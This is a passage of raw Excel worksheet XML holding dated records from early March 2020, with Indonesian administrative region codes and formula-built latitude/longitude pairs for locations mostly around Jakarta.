    <row r="1930" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1930">
        <v>172275</v>
      </c>
      <c r="B1930" s="1">
        <v>43891</v>
      </c>
      <c r="C1930" t="s">
        <v>6442</v>
      </c>
      <c r="D1930" t="s">
        <v>2648</v>
      </c>
      <c r="E1930" t="s">
        <v>23</v>
      </c>
      <c r="G1930" t="s">
        <v>6446</v>
      </c>
      <c r="H1930" t="s">
        <v>26</v>
      </c>
      <c r="J1930" t="s">
        <v>6447</v>
      </c>
      <c r="L1930" t="s">
        <v>6448</v>
      </c>
      <c r="M1930">
        <v>3175060002</v>
      </c>
      <c r="N1930">
        <v>3175060</v>
      </c>
      <c r="O1930">
        <v>3175</v>
      </c>
      <c r="P1930">
        <v>31</v>
      </c>
      <c r="Q1930" t="s">
        <v>2674</v>
      </c>
      <c r="R1930" t="s">
        <v>2279</v>
      </c>
      <c r="S1930" t="s">
        <v>547</v>
      </c>
      <c r="T1930" t="s">
        <v>33</v>
      </c>
      <c r="U1930" s="5">
        <v>10695081</v>
      </c>
      <c r="V1930" s="5" t="s">
        <v>16168</v>
      </c>
      <c r="W1930" s="5">
        <v>-616244</v>
      </c>
      <c r="X1930" t="s">
        <v>19925</v>
      </c>
      <c r="Y1930" t="str">
        <f t="shared" si="30"/>
        <v>-6.16244,106.95081</v>
      </c>
    </row>
    <row r="1931" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1931">
        <v>172473</v>
      </c>
      <c r="B1931" s="1">
        <v>43891</v>
      </c>
      <c r="C1931" t="s">
        <v>6449</v>
      </c>
      <c r="D1931" t="s">
        <v>2648</v>
      </c>
      <c r="E1931" t="s">
        <v>23</v>
      </c>
      <c r="G1931" t="s">
        <v>6450</v>
      </c>
      <c r="H1931" t="s">
        <v>26</v>
      </c>
      <c r="J1931" t="s">
        <v>667</v>
      </c>
      <c r="L1931" t="s">
        <v>6451</v>
      </c>
      <c r="M1931">
        <v>3175010003</v>
      </c>
      <c r="N1931">
        <v>3175010</v>
      </c>
      <c r="O1931">
        <v>3175</v>
      </c>
      <c r="P1931">
        <v>31</v>
      </c>
      <c r="Q1931" t="s">
        <v>545</v>
      </c>
      <c r="R1931" t="s">
        <v>546</v>
      </c>
      <c r="S1931" t="s">
        <v>547</v>
      </c>
      <c r="T1931" t="s">
        <v>33</v>
      </c>
      <c r="U1931" s="5">
        <v>10677731</v>
      </c>
      <c r="V1931" s="5" t="s">
        <v>16169</v>
      </c>
      <c r="W1931" s="5">
        <v>-613314</v>
      </c>
      <c r="X1931" t="s">
        <v>19926</v>
      </c>
      <c r="Y1931" t="str">
        <f t="shared" si="30"/>
        <v>-6.13314,106.77731</v>
      </c>
    </row>
    <row r="1932" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1932">
        <v>172476</v>
      </c>
      <c r="B1932" s="1">
        <v>43891</v>
      </c>
      <c r="C1932" t="s">
        <v>6449</v>
      </c>
      <c r="D1932" t="s">
        <v>2648</v>
      </c>
      <c r="E1932" t="s">
        <v>23</v>
      </c>
      <c r="G1932" t="s">
        <v>6452</v>
      </c>
      <c r="H1932" t="s">
        <v>26</v>
      </c>
      <c r="J1932" t="s">
        <v>614</v>
      </c>
      <c r="L1932" t="s">
        <v>6453</v>
      </c>
      <c r="M1932">
        <v>3175010002</v>
      </c>
      <c r="N1932">
        <v>3175010</v>
      </c>
      <c r="O1932">
        <v>3175</v>
      </c>
      <c r="P1932">
        <v>31</v>
      </c>
      <c r="Q1932" t="s">
        <v>616</v>
      </c>
      <c r="R1932" t="s">
        <v>546</v>
      </c>
      <c r="S1932" t="s">
        <v>547</v>
      </c>
      <c r="T1932" t="s">
        <v>33</v>
      </c>
      <c r="U1932" s="5">
        <v>10677674</v>
      </c>
      <c r="V1932" s="5" t="s">
        <v>16170</v>
      </c>
      <c r="W1932" s="5">
        <v>-613341</v>
      </c>
      <c r="X1932" t="s">
        <v>19927</v>
      </c>
      <c r="Y1932" t="str">
        <f t="shared" si="30"/>
        <v>-6.13341,106.77674</v>
      </c>
    </row>
    <row r="1933" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1933">
        <v>172734</v>
      </c>
      <c r="B1933" s="1">
        <v>43891</v>
      </c>
      <c r="C1933" t="s">
        <v>6454</v>
      </c>
      <c r="D1933" t="s">
        <v>22</v>
      </c>
      <c r="E1933" t="s">
        <v>23</v>
      </c>
      <c r="F1933" t="s">
        <v>6455</v>
      </c>
      <c r="G1933" t="s">
        <v>6456</v>
      </c>
      <c r="H1933" t="s">
        <v>26</v>
      </c>
      <c r="I1933" t="s">
        <v>5752</v>
      </c>
      <c r="J1933" t="s">
        <v>3135</v>
      </c>
      <c r="L1933" t="s">
        <v>6457</v>
      </c>
      <c r="M1933">
        <v>3603050003</v>
      </c>
      <c r="N1933">
        <v>3603050</v>
      </c>
      <c r="O1933">
        <v>3603</v>
      </c>
      <c r="P1933">
        <v>36</v>
      </c>
      <c r="Q1933" t="s">
        <v>3987</v>
      </c>
      <c r="R1933" t="s">
        <v>3988</v>
      </c>
      <c r="S1933" t="s">
        <v>201</v>
      </c>
      <c r="T1933" t="s">
        <v>171</v>
      </c>
      <c r="U1933" s="5">
        <v>10657732</v>
      </c>
      <c r="V1933" s="5" t="s">
        <v>15431</v>
      </c>
      <c r="W1933" s="5">
        <v>-625163</v>
      </c>
      <c r="X1933" t="s">
        <v>19928</v>
      </c>
      <c r="Y1933" t="str">
        <f t="shared" si="30"/>
        <v>-6.25163,106.57732</v>
      </c>
    </row>
    <row r="1934" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1934">
        <v>172737</v>
      </c>
      <c r="B1934" s="1">
        <v>43891</v>
      </c>
      <c r="C1934" t="s">
        <v>6454</v>
      </c>
      <c r="D1934" t="s">
        <v>22</v>
      </c>
      <c r="E1934" t="s">
        <v>23</v>
      </c>
      <c r="F1934" t="s">
        <v>6458</v>
      </c>
      <c r="G1934" t="s">
        <v>6459</v>
      </c>
      <c r="H1934" t="s">
        <v>26</v>
      </c>
      <c r="I1934" t="s">
        <v>3716</v>
      </c>
      <c r="J1934" t="s">
        <v>3135</v>
      </c>
      <c r="L1934" t="s">
        <v>6460</v>
      </c>
      <c r="M1934">
        <v>3603050003</v>
      </c>
      <c r="N1934">
        <v>3603050</v>
      </c>
      <c r="O1934">
        <v>3603</v>
      </c>
      <c r="P1934">
        <v>36</v>
      </c>
      <c r="Q1934" t="s">
        <v>3987</v>
      </c>
      <c r="R1934" t="s">
        <v>3988</v>
      </c>
      <c r="S1934" t="s">
        <v>201</v>
      </c>
      <c r="T1934" t="s">
        <v>171</v>
      </c>
      <c r="U1934" s="5">
        <v>10657723</v>
      </c>
      <c r="V1934" s="5" t="s">
        <v>16171</v>
      </c>
      <c r="W1934" s="5">
        <v>-625171</v>
      </c>
      <c r="X1934" t="s">
        <v>19929</v>
      </c>
      <c r="Y1934" t="str">
        <f t="shared" si="30"/>
        <v>-6.25171,106.57723</v>
      </c>
    </row>
    <row r="1935" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1935">
        <v>172738</v>
      </c>
      <c r="B1935" s="1">
        <v>43891</v>
      </c>
      <c r="C1935" t="s">
        <v>6454</v>
      </c>
      <c r="D1935" t="s">
        <v>22</v>
      </c>
      <c r="E1935" t="s">
        <v>23</v>
      </c>
      <c r="F1935" t="s">
        <v>6461</v>
      </c>
      <c r="G1935" t="s">
        <v>6462</v>
      </c>
      <c r="H1935" t="s">
        <v>26</v>
      </c>
      <c r="I1935" t="s">
        <v>1090</v>
      </c>
      <c r="J1935" t="s">
        <v>3135</v>
      </c>
      <c r="L1935" t="s">
        <v>6463</v>
      </c>
      <c r="M1935">
        <v>3603050003</v>
      </c>
      <c r="N1935">
        <v>3603050</v>
      </c>
      <c r="O1935">
        <v>3603</v>
      </c>
      <c r="P1935">
        <v>36</v>
      </c>
      <c r="Q1935" t="s">
        <v>3987</v>
      </c>
      <c r="R1935" t="s">
        <v>3988</v>
      </c>
      <c r="S1935" t="s">
        <v>201</v>
      </c>
      <c r="T1935" t="s">
        <v>171</v>
      </c>
      <c r="U1935" s="5">
        <v>10657732</v>
      </c>
      <c r="V1935" s="5" t="s">
        <v>15431</v>
      </c>
      <c r="W1935" s="5">
        <v>-625163</v>
      </c>
      <c r="X1935" t="s">
        <v>19928</v>
      </c>
      <c r="Y1935" t="str">
        <f t="shared" si="30"/>
        <v>-6.25163,106.57732</v>
      </c>
    </row>
    <row r="1936" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1936">
        <v>172765</v>
      </c>
      <c r="B1936" s="1">
        <v>43891</v>
      </c>
      <c r="C1936" t="s">
        <v>6454</v>
      </c>
      <c r="D1936" t="s">
        <v>2648</v>
      </c>
      <c r="E1936" t="s">
        <v>23</v>
      </c>
      <c r="G1936" t="s">
        <v>6464</v>
      </c>
      <c r="H1936" t="s">
        <v>26</v>
      </c>
      <c r="I1936" t="s">
        <v>103</v>
      </c>
      <c r="J1936" t="s">
        <v>4625</v>
      </c>
      <c r="L1936" t="s">
        <v>6465</v>
      </c>
      <c r="M1936">
        <v>3173060006</v>
      </c>
      <c r="N1936">
        <v>3173060</v>
      </c>
      <c r="O1936">
        <v>3173</v>
      </c>
      <c r="P1936">
        <v>31</v>
      </c>
      <c r="Q1936" t="s">
        <v>1587</v>
      </c>
      <c r="R1936" t="s">
        <v>61</v>
      </c>
      <c r="S1936" t="s">
        <v>62</v>
      </c>
      <c r="T1936" t="s">
        <v>33</v>
      </c>
      <c r="U1936" s="5">
        <v>10685516</v>
      </c>
      <c r="V1936" s="5" t="s">
        <v>16172</v>
      </c>
      <c r="W1936" s="5">
        <v>-615558</v>
      </c>
      <c r="X1936" t="s">
        <v>19930</v>
      </c>
      <c r="Y1936" t="str">
        <f t="shared" si="30"/>
        <v>-6.15558,106.85516</v>
      </c>
    </row>
    <row r="1937" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1937">
        <v>172772</v>
      </c>
      <c r="B1937" s="1">
        <v>43891</v>
      </c>
      <c r="C1937" t="s">
        <v>6454</v>
      </c>
      <c r="D1937" t="s">
        <v>22</v>
      </c>
      <c r="E1937" t="s">
        <v>23</v>
      </c>
      <c r="F1937" t="s">
        <v>6466</v>
      </c>
      <c r="G1937" t="s">
        <v>6467</v>
      </c>
      <c r="H1937" t="s">
        <v>26</v>
      </c>
      <c r="I1937" t="s">
        <v>1080</v>
      </c>
      <c r="J1937" t="s">
        <v>2627</v>
      </c>
      <c r="L1937" t="s">
        <v>6468</v>
      </c>
      <c r="M1937">
        <v>3276060004</v>
      </c>
      <c r="N1937">
        <v>3276060</v>
      </c>
      <c r="O1937">
        <v>3276</v>
      </c>
      <c r="P1937">
        <v>32</v>
      </c>
      <c r="Q1937" t="s">
        <v>6469</v>
      </c>
      <c r="R1937" t="s">
        <v>6469</v>
      </c>
      <c r="S1937" t="s">
        <v>185</v>
      </c>
      <c r="T1937" t="s">
        <v>42</v>
      </c>
      <c r="U1937" s="5">
        <v>10677841</v>
      </c>
      <c r="V1937" s="5" t="s">
        <v>16173</v>
      </c>
      <c r="W1937" s="5">
        <v>-635879</v>
      </c>
      <c r="X1937" t="s">
        <v>19931</v>
      </c>
      <c r="Y1937" t="str">
        <f t="shared" si="30"/>
        <v>-6.35879,106.77841</v>
      </c>
    </row>
    <row r="1938" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1938">
        <v>173053</v>
      </c>
      <c r="B1938" s="1">
        <v>43892</v>
      </c>
      <c r="C1938" t="s">
        <v>6442</v>
      </c>
      <c r="D1938" t="s">
        <v>22</v>
      </c>
      <c r="E1938" t="s">
        <v>23</v>
      </c>
      <c r="F1938" t="s">
        <v>6470</v>
      </c>
      <c r="H1938" t="s">
        <v>26</v>
      </c>
      <c r="I1938" t="s">
        <v>1263</v>
      </c>
      <c r="J1938" t="s">
        <v>2608</v>
      </c>
      <c r="L1938" t="s">
        <v>6471</v>
      </c>
      <c r="M1938">
        <v>3320080005</v>
      </c>
      <c r="N1938">
        <v>3320080</v>
      </c>
      <c r="O1938">
        <v>3320</v>
      </c>
      <c r="P1938">
        <v>33</v>
      </c>
      <c r="Q1938" t="s">
        <v>6472</v>
      </c>
      <c r="R1938" t="s">
        <v>2976</v>
      </c>
      <c r="S1938" t="s">
        <v>2976</v>
      </c>
      <c r="T1938" t="s">
        <v>1134</v>
      </c>
      <c r="U1938" s="5">
        <v>11066764</v>
      </c>
      <c r="V1938" s="5" t="s">
        <v>16174</v>
      </c>
      <c r="W1938" s="5">
        <v>-659197</v>
      </c>
      <c r="X1938" t="s">
        <v>19932</v>
      </c>
      <c r="Y1938" t="str">
        <f t="shared" si="30"/>
        <v>-6.59197,110.66764</v>
      </c>
    </row>
    <row r="1939" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1939">
        <v>173062</v>
      </c>
      <c r="B1939" s="1">
        <v>43892</v>
      </c>
      <c r="C1939" t="s">
        <v>6442</v>
      </c>
      <c r="D1939" t="s">
        <v>22</v>
      </c>
      <c r="E1939" t="s">
        <v>23</v>
      </c>
      <c r="F1939" t="s">
        <v>6473</v>
      </c>
      <c r="G1939" t="s">
        <v>6474</v>
      </c>
      <c r="H1939" t="s">
        <v>26</v>
      </c>
      <c r="I1939" t="s">
        <v>2966</v>
      </c>
      <c r="J1939" t="s">
        <v>2608</v>
      </c>
      <c r="L1939" t="s">
        <v>6475</v>
      </c>
      <c r="M1939">
        <v>3320080005</v>
      </c>
      <c r="N1939">
        <v>3320080</v>
      </c>
      <c r="O1939">
        <v>3320</v>
      </c>
      <c r="P1939">
        <v>33</v>
      </c>
      <c r="Q1939" t="s">
        <v>6472</v>
      </c>
      <c r="R1939" t="s">
        <v>2976</v>
      </c>
      <c r="S1939" t="s">
        <v>2976</v>
      </c>
      <c r="T1939" t="s">
        <v>1134</v>
      </c>
      <c r="U1939" s="5">
        <v>11066763</v>
      </c>
      <c r="V1939" s="5" t="s">
        <v>16175</v>
      </c>
      <c r="W1939" s="5">
        <v>-659197</v>
      </c>
      <c r="X1939" t="s">
        <v>19932</v>
      </c>
      <c r="Y1939" t="str">
        <f t="shared" si="30"/>
        <v>-6.59197,110.66763</v>
      </c>
    </row>
    <row r="1940" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1940">
        <v>173182</v>
      </c>
      <c r="B1940" s="1">
        <v>43892</v>
      </c>
      <c r="C1940" t="s">
        <v>6476</v>
      </c>
      <c r="D1940" t="s">
        <v>22</v>
      </c>
      <c r="E1940" t="s">
        <v>23</v>
      </c>
      <c r="F1940" t="s">
        <v>6477</v>
      </c>
      <c r="G1940" t="s">
        <v>6478</v>
      </c>
      <c r="H1940" t="s">
        <v>26</v>
      </c>
      <c r="I1940" t="s">
        <v>1194</v>
      </c>
      <c r="J1940" t="s">
        <v>6479</v>
      </c>
      <c r="L1940" t="s">
        <v>2794</v>
      </c>
      <c r="M1940">
        <v>3173080002</v>
      </c>
      <c r="N1940">
        <v>3173080</v>
      </c>
      <c r="O1940">
        <v>3173</v>
      </c>
      <c r="P1940">
        <v>31</v>
      </c>
      <c r="Q1940" t="s">
        <v>6480</v>
      </c>
      <c r="R1940" t="s">
        <v>157</v>
      </c>
      <c r="S1940" t="s">
        <v>62</v>
      </c>
      <c r="T1940" t="s">
        <v>33</v>
      </c>
      <c r="U1940" s="5">
        <v>10681578</v>
      </c>
      <c r="V1940" s="5" t="s">
        <v>16176</v>
      </c>
      <c r="W1940" s="5">
        <v>-617732</v>
      </c>
      <c r="X1940" t="s">
        <v>19933</v>
      </c>
      <c r="Y1940" t="str">
        <f t="shared" si="30"/>
        <v>-6.17732,106.81578</v>
      </c>
    </row>
    <row r="1941" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1941">
        <v>173213</v>
      </c>
      <c r="B1941" s="1">
        <v>43892</v>
      </c>
      <c r="C1941" t="s">
        <v>6481</v>
      </c>
      <c r="D1941" t="s">
        <v>2648</v>
      </c>
      <c r="E1941" t="s">
        <v>23</v>
      </c>
      <c r="G1941" t="s">
        <v>6482</v>
      </c>
      <c r="H1941" t="s">
        <v>26</v>
      </c>
      <c r="J1941" t="s">
        <v>2705</v>
      </c>
      <c r="L1941" t="s">
        <v>6483</v>
      </c>
      <c r="M1941">
        <v>3172090006</v>
      </c>
      <c r="N1941">
        <v>3172090</v>
      </c>
      <c r="O1941">
        <v>3172</v>
      </c>
      <c r="P1941">
        <v>31</v>
      </c>
      <c r="Q1941" t="s">
        <v>2283</v>
      </c>
      <c r="R1941" t="s">
        <v>890</v>
      </c>
      <c r="S1941" t="s">
        <v>49</v>
      </c>
      <c r="T1941" t="s">
        <v>33</v>
      </c>
      <c r="U1941" s="5">
        <v>10688250</v>
      </c>
      <c r="V1941" s="5" t="s">
        <v>16177</v>
      </c>
      <c r="W1941" s="5">
        <v>-616933</v>
      </c>
      <c r="X1941" t="s">
        <v>19934</v>
      </c>
      <c r="Y1941" t="str">
        <f t="shared" si="30"/>
        <v>-6.16933,106.88250</v>
      </c>
    </row>
    <row r="1942" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1942">
        <v>173244</v>
      </c>
      <c r="B1942" s="1">
        <v>43892</v>
      </c>
      <c r="C1942" t="s">
        <v>6481</v>
      </c>
      <c r="D1942" t="s">
        <v>2648</v>
      </c>
      <c r="E1942" t="s">
        <v>23</v>
      </c>
      <c r="G1942" t="s">
        <v>6484</v>
      </c>
      <c r="H1942" t="s">
        <v>26</v>
      </c>
      <c r="J1942" t="s">
        <v>387</v>
      </c>
      <c r="L1942" t="s">
        <v>6485</v>
      </c>
      <c r="M1942">
        <v>3174040007</v>
      </c>
      <c r="N1942">
        <v>3174040</v>
      </c>
      <c r="O1942">
        <v>3174</v>
      </c>
      <c r="P1942">
        <v>31</v>
      </c>
      <c r="Q1942" t="s">
        <v>389</v>
      </c>
      <c r="R1942" t="s">
        <v>377</v>
      </c>
      <c r="S1942" t="s">
        <v>32</v>
      </c>
      <c r="T1942" t="s">
        <v>33</v>
      </c>
      <c r="U1942" s="5">
        <v>10678165</v>
      </c>
      <c r="V1942" s="5" t="s">
        <v>16178</v>
      </c>
      <c r="W1942" s="5">
        <v>-615107</v>
      </c>
      <c r="X1942" t="s">
        <v>19935</v>
      </c>
      <c r="Y1942" t="str">
        <f t="shared" si="30"/>
        <v>-6.15107,106.78165</v>
      </c>
    </row>
    <row r="1943" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1943">
        <v>173284</v>
      </c>
      <c r="B1943" s="1">
        <v>43892</v>
      </c>
      <c r="C1943" t="s">
        <v>6454</v>
      </c>
      <c r="D1943" t="s">
        <v>22</v>
      </c>
      <c r="E1943" t="s">
        <v>23</v>
      </c>
      <c r="F1943" t="s">
        <v>6486</v>
      </c>
      <c r="H1943" t="s">
        <v>26</v>
      </c>
      <c r="I1943" t="s">
        <v>1263</v>
      </c>
      <c r="J1943" t="s">
        <v>2608</v>
      </c>
      <c r="L1943" t="s">
        <v>6487</v>
      </c>
      <c r="M1943">
        <v>3320080004</v>
      </c>
      <c r="N1943">
        <v>3320080</v>
      </c>
      <c r="O1943">
        <v>3320</v>
      </c>
      <c r="P1943">
        <v>33</v>
      </c>
      <c r="Q1943" t="s">
        <v>2975</v>
      </c>
      <c r="R1943" t="s">
        <v>2976</v>
      </c>
      <c r="S1943" t="s">
        <v>2976</v>
      </c>
      <c r="T1943" t="s">
        <v>1134</v>
      </c>
      <c r="U1943" s="5">
        <v>11066570</v>
      </c>
      <c r="V1943" s="5" t="s">
        <v>16179</v>
      </c>
      <c r="W1943" s="5">
        <v>-659125</v>
      </c>
      <c r="X1943" t="s">
        <v>19936</v>
      </c>
      <c r="Y1943" t="str">
        <f t="shared" si="30"/>
        <v>-6.59125,110.66570</v>
      </c>
    </row>
    <row r="1944" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1944">
        <v>173459</v>
      </c>
      <c r="B1944" s="1">
        <v>43892</v>
      </c>
      <c r="C1944" t="s">
        <v>6488</v>
      </c>
      <c r="D1944" t="s">
        <v>22</v>
      </c>
      <c r="E1944" t="s">
        <v>23</v>
      </c>
      <c r="F1944" t="s">
        <v>6489</v>
      </c>
      <c r="H1944" t="s">
        <v>26</v>
      </c>
      <c r="I1944" t="s">
        <v>1447</v>
      </c>
      <c r="J1944" t="s">
        <v>2622</v>
      </c>
      <c r="L1944" t="s">
        <v>6490</v>
      </c>
      <c r="M1944">
        <v>3509720004</v>
      </c>
      <c r="N1944">
        <v>3509720</v>
      </c>
      <c r="O1944">
        <v>3509</v>
      </c>
      <c r="P1944">
        <v>35</v>
      </c>
      <c r="Q1944" t="s">
        <v>6491</v>
      </c>
      <c r="R1944" t="s">
        <v>1801</v>
      </c>
      <c r="S1944" t="s">
        <v>6492</v>
      </c>
      <c r="T1944" t="s">
        <v>1221</v>
      </c>
      <c r="U1944" s="5">
        <v>11370433</v>
      </c>
      <c r="V1944" s="5" t="s">
        <v>16180</v>
      </c>
      <c r="W1944" s="5">
        <v>-817874</v>
      </c>
      <c r="X1944" t="s">
        <v>19937</v>
      </c>
      <c r="Y1944" t="str">
        <f t="shared" si="30"/>
        <v>-8.17874,113.70433</v>
      </c>
    </row>
    <row r="1945" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1945">
        <v>173460</v>
      </c>
      <c r="B1945" s="1">
        <v>43893</v>
      </c>
      <c r="C1945" t="s">
        <v>6442</v>
      </c>
      <c r="D1945" t="s">
        <v>2648</v>
      </c>
      <c r="E1945" t="s">
        <v>23</v>
      </c>
      <c r="G1945" t="s">
        <v>6493</v>
      </c>
      <c r="H1945" t="s">
        <v>26</v>
      </c>
      <c r="J1945" t="s">
        <v>6494</v>
      </c>
      <c r="L1945" t="s">
        <v>6495</v>
      </c>
      <c r="M1945">
        <v>3175030001</v>
      </c>
      <c r="N1945">
        <v>3175030</v>
      </c>
      <c r="O1945">
        <v>3175</v>
      </c>
      <c r="P1945">
        <v>31</v>
      </c>
      <c r="Q1945" t="s">
        <v>1574</v>
      </c>
      <c r="R1945" t="s">
        <v>1563</v>
      </c>
      <c r="S1945" t="s">
        <v>547</v>
      </c>
      <c r="T1945" t="s">
        <v>33</v>
      </c>
      <c r="U1945" s="5">
        <v>10686346</v>
      </c>
      <c r="V1945" s="5" t="s">
        <v>16181</v>
      </c>
      <c r="W1945" s="5">
        <v>-613219</v>
      </c>
      <c r="X1945" t="s">
        <v>19938</v>
      </c>
      <c r="Y1945" t="str">
        <f t="shared" si="30"/>
        <v>-6.13219,106.86346</v>
      </c>
    </row>
    <row r="1946" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1946">
        <v>173474</v>
      </c>
      <c r="B1946" s="1">
        <v>43893</v>
      </c>
      <c r="C1946" t="s">
        <v>6476</v>
      </c>
      <c r="D1946" t="s">
        <v>22</v>
      </c>
      <c r="E1946" t="s">
        <v>23</v>
      </c>
      <c r="F1946" t="s">
        <v>6496</v>
      </c>
      <c r="G1946" t="s">
        <v>6497</v>
      </c>
      <c r="H1946" t="s">
        <v>26</v>
      </c>
      <c r="I1946" t="s">
        <v>523</v>
      </c>
      <c r="J1946" t="s">
        <v>6498</v>
      </c>
      <c r="M1946">
        <v>7502042001</v>
      </c>
      <c r="N1946">
        <v>7502042</v>
      </c>
      <c r="O1946">
        <v>7502</v>
      </c>
      <c r="P1946">
        <v>75</v>
      </c>
      <c r="Q1946" t="s">
        <v>6499</v>
      </c>
      <c r="R1946" t="s">
        <v>6500</v>
      </c>
      <c r="S1946" t="s">
        <v>6501</v>
      </c>
      <c r="T1946" t="s">
        <v>6501</v>
      </c>
      <c r="U1946" s="5">
        <v>12258699</v>
      </c>
      <c r="V1946" s="5" t="s">
        <v>16182</v>
      </c>
      <c r="W1946" s="5">
        <v>69967</v>
      </c>
      <c r="X1946" t="s">
        <v>14430</v>
      </c>
      <c r="Y1946" t="str">
        <f t="shared" si="30"/>
        <v>0.69967,122.58699</v>
      </c>
    </row>
    <row r="1947" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1947">
        <v>173475</v>
      </c>
      <c r="B1947" s="1">
        <v>43893</v>
      </c>
      <c r="C1947" t="s">
        <v>6481</v>
      </c>
      <c r="D1947" t="s">
        <v>22</v>
      </c>
      <c r="E1947" t="s">
        <v>23</v>
      </c>
      <c r="F1947" t="s">
        <v>6502</v>
      </c>
      <c r="G1947" t="s">
        <v>6503</v>
      </c>
      <c r="H1947" t="s">
        <v>26</v>
      </c>
      <c r="I1947" t="s">
        <v>882</v>
      </c>
      <c r="J1947" t="s">
        <v>2615</v>
      </c>
      <c r="L1947" t="s">
        <v>6504</v>
      </c>
      <c r="M1947">
        <v>3404120001</v>
      </c>
      <c r="N1947">
        <v>3404120</v>
      </c>
      <c r="O1947">
        <v>3404</v>
      </c>
      <c r="P1947">
        <v>34</v>
      </c>
      <c r="Q1947" t="s">
        <v>6505</v>
      </c>
      <c r="R1947" t="s">
        <v>6506</v>
      </c>
      <c r="S1947" t="s">
        <v>1855</v>
      </c>
      <c r="T1947" t="s">
        <v>1856</v>
      </c>
      <c r="U1947" s="5">
        <v>11038413</v>
      </c>
      <c r="V1947" s="5" t="s">
        <v>16183</v>
      </c>
      <c r="W1947" s="5">
        <v>-772070</v>
      </c>
      <c r="X1947" t="s">
        <v>19939</v>
      </c>
      <c r="Y1947" t="str">
        <f t="shared" si="30"/>
        <v>-7.72070,110.38413</v>
      </c>
    </row>
    <row r="1948" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1948">
        <v>173476</v>
      </c>
      <c r="B1948" s="1">
        <v>43893</v>
      </c>
      <c r="C1948" t="s">
        <v>6454</v>
      </c>
      <c r="D1948" t="s">
        <v>22</v>
      </c>
      <c r="E1948" t="s">
        <v>23</v>
      </c>
      <c r="F1948" t="s">
        <v>6507</v>
      </c>
      <c r="G1948" t="s">
        <v>6508</v>
      </c>
      <c r="H1948" t="s">
        <v>26</v>
      </c>
      <c r="I1948" t="s">
        <v>1194</v>
      </c>
      <c r="J1948" t="s">
        <v>6509</v>
      </c>
      <c r="M1948">
        <v>6371010003</v>
      </c>
      <c r="N1948">
        <v>6371010</v>
      </c>
      <c r="O1948">
        <v>6371</v>
      </c>
      <c r="P1948">
        <v>63</v>
      </c>
      <c r="Q1948" t="s">
        <v>6510</v>
      </c>
      <c r="R1948" t="s">
        <v>6511</v>
      </c>
      <c r="S1948" t="s">
        <v>6512</v>
      </c>
      <c r="T1948" t="s">
        <v>6513</v>
      </c>
      <c r="U1948" s="5">
        <v>11458919</v>
      </c>
      <c r="V1948" s="5" t="s">
        <v>16184</v>
      </c>
      <c r="W1948" s="5">
        <v>-333903</v>
      </c>
      <c r="X1948" t="s">
        <v>19940</v>
      </c>
      <c r="Y1948" t="str">
        <f t="shared" si="30"/>
        <v>-3.33903,114.58919</v>
      </c>
    </row>
    <row r="1949" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1949">
        <v>173477</v>
      </c>
      <c r="B1949" s="1">
        <v>43894</v>
      </c>
      <c r="C1949" t="s">
        <v>6514</v>
      </c>
      <c r="D1949" t="s">
        <v>2648</v>
      </c>
      <c r="E1949" t="s">
        <v>23</v>
      </c>
      <c r="G1949" t="s">
        <v>6515</v>
      </c>
      <c r="H1949" t="s">
        <v>26</v>
      </c>
      <c r="J1949" t="s">
        <v>6516</v>
      </c>
      <c r="L1949" t="s">
        <v>6517</v>
      </c>
      <c r="M1949">
        <v>3172060001</v>
      </c>
      <c r="N1949">
        <v>3172060</v>
      </c>
      <c r="O1949">
        <v>3172</v>
      </c>
      <c r="P1949">
        <v>31</v>
      </c>
      <c r="Q1949" t="s">
        <v>309</v>
      </c>
      <c r="R1949" t="s">
        <v>48</v>
      </c>
      <c r="S1949" t="s">
        <v>49</v>
      </c>
      <c r="T1949" t="s">
        <v>33</v>
      </c>
      <c r="U1949" s="5">
        <v>10686828</v>
      </c>
      <c r="V1949" s="5" t="s">
        <v>16185</v>
      </c>
      <c r="W1949" s="5">
        <v>-622876</v>
      </c>
      <c r="X1949" t="s">
        <v>19941</v>
      </c>
      <c r="Y1949" t="str">
        <f t="shared" si="30"/>
        <v>-6.22876,106.86828</v>
      </c>
    </row>
    <row r="1950" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1950">
        <v>173479</v>
      </c>
      <c r="B1950" s="1">
        <v>43894</v>
      </c>
      <c r="C1950" t="s">
        <v>6514</v>
      </c>
      <c r="D1950" t="s">
        <v>2648</v>
      </c>
      <c r="E1950" t="s">
        <v>23</v>
      </c>
      <c r="G1950" t="s">
        <v>6518</v>
      </c>
      <c r="H1950" t="s">
        <v>26</v>
      </c>
      <c r="J1950" t="s">
        <v>5747</v>
      </c>
      <c r="L1950" t="s">
        <v>6519</v>
      </c>
      <c r="M1950">
        <v>3172050002</v>
      </c>
      <c r="N1950">
        <v>3172050</v>
      </c>
      <c r="O1950">
        <v>3172</v>
      </c>
      <c r="P1950">
        <v>31</v>
      </c>
      <c r="Q1950" t="s">
        <v>5749</v>
      </c>
      <c r="R1950" t="s">
        <v>358</v>
      </c>
      <c r="S1950" t="s">
        <v>49</v>
      </c>
      <c r="T1950" t="s">
        <v>33</v>
      </c>
      <c r="U1950" s="5">
        <v>10685641</v>
      </c>
      <c r="V1950" s="5" t="s">
        <v>16186</v>
      </c>
      <c r="W1950" s="5">
        <v>-629194</v>
      </c>
      <c r="X1950" t="s">
        <v>19942</v>
      </c>
      <c r="Y1950" t="str">
        <f t="shared" si="30"/>
        <v>-6.29194,106.85641</v>
      </c>
    </row>
    <row r="1951" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1951">
        <v>173480</v>
      </c>
      <c r="B1951" s="1">
        <v>43894</v>
      </c>
